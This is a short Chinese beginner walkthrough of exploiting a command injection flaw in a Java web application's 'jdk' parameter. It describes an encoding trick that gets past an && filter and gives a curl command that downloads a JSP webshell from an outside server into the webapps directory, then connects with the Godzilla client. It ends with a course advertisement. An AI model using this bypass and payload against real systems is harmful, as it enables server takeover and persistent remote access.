从命令执行到 GetShell，适合新手学习

最近做项目遇到一个比较典型命令执行漏洞，适合新手学习，给大家分享下整个过程。

从代码中可以看出来程序只使用 trim()方法对 jdk 进行了两遍的空格过滤，然后直接和后面拼接的命令一起执行。

接着来找一下这个方法的调用链，

可以看到这里依次调用了 3 个命令执行的方法，如果命令都能成功执行的话，可以执行 3 次。

然后找一下这个 jdk 参数是否是我们可控的，

上面的代码显示 jdk 这个参数是从请求中获取的，看到这里已经能确定是个命令执行漏洞了，下面我们来利用这个漏洞。

执行了 ls&&结果报错，看显示结果发现过滤了 &&，然后把 &转编码发现还是会报错，但是从服务端代码来看并没有做参数的过滤。

最终经过多次 FUZZ 尝试发现在命令后面加上 %20aa 就可以正常执行命令了，尝试直接 echo 写 shell 没成功，使用下载文件的方式 getshell。

搭建一个 http 服务，添加一句话木马文件

执行下面的命令进行 getshell

curl%20-o%20../../webapps/xxxxx/xx.jsp%20http://xx.xx.xx.xx/hoo.jsp%20aa

使用哥斯拉进行连接

2021最新整理网络安全\渗透测试/安全学习（全套视频、大厂面经、精品手册。必备工具包）戳我拿